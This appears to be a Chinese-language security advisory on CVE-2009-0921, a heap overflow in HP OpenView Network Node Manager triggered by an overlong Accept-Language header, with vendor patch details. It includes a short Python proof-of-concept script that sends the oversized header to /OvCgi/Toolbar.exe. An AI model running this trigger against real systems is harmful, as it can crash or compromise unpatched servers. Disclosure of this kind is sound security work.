发布日期：2009-03-23
更新日期：2009-03-24

受影响系统：

HP OpenView Network Node Manager 7.53
HP OpenView Network Node Manager 7.51
HP OpenView Network Node Manager 7.01

描述：

---

BUGTRAQ  ID: 34135
CVE(CAN) ID: CVE-2009-0921

HP OpenView网络节点管理器（OV NNM）是HP公司开发和维护的网络管理系统软件，具有强大的网络节点管理功能。

如果向OV NNM发送了超长的Accept-Language头的话，就可以触发堆溢出，导致执行任意代码。此外Solaris平台的libovwww.so.4和Windows平台的ovwww.dll文件中也存在这个漏洞。


<*来源：Oren Isacson
  
  链接：http://marc.info/?l=bugtraq&m=123783393501638&w=2#2
        http://secunia.com/advisories/34444/
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729&printver=true
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/-----------

import socket,sys
if len(sys.argv)!=3:
    print "USAGE:AcceptLanguage.py server port"
else:
    req="POST /OvCgi/Toolbar.exe HTTP/1.0\nAccept-Language:
"+'a'*1400+"\nContent-Length:0\nHost:192.168.22.252\n\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1],int(sys.argv[2])))
    s.send(req)
    print s.recv(4000)

- -----------/

建议：

---

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBMA02416）以及相应补丁:
HPSBMA02416：SSRT090008 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729&printver=true

浏览次数：2474
严重程度：0（网友投票）